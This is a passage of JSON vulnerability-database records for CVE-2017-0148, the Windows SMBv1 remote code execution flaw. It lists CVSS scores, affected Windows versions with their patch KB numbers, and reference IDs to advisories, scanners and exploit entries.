for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T14:49:48", "differentElements": ["msAffectedSoftware"], "edition": 63}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T16:52:15", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T16:52:15", "differentElements": ["msAffectedSoftware"], "edition": 64}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T18:49:52", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", 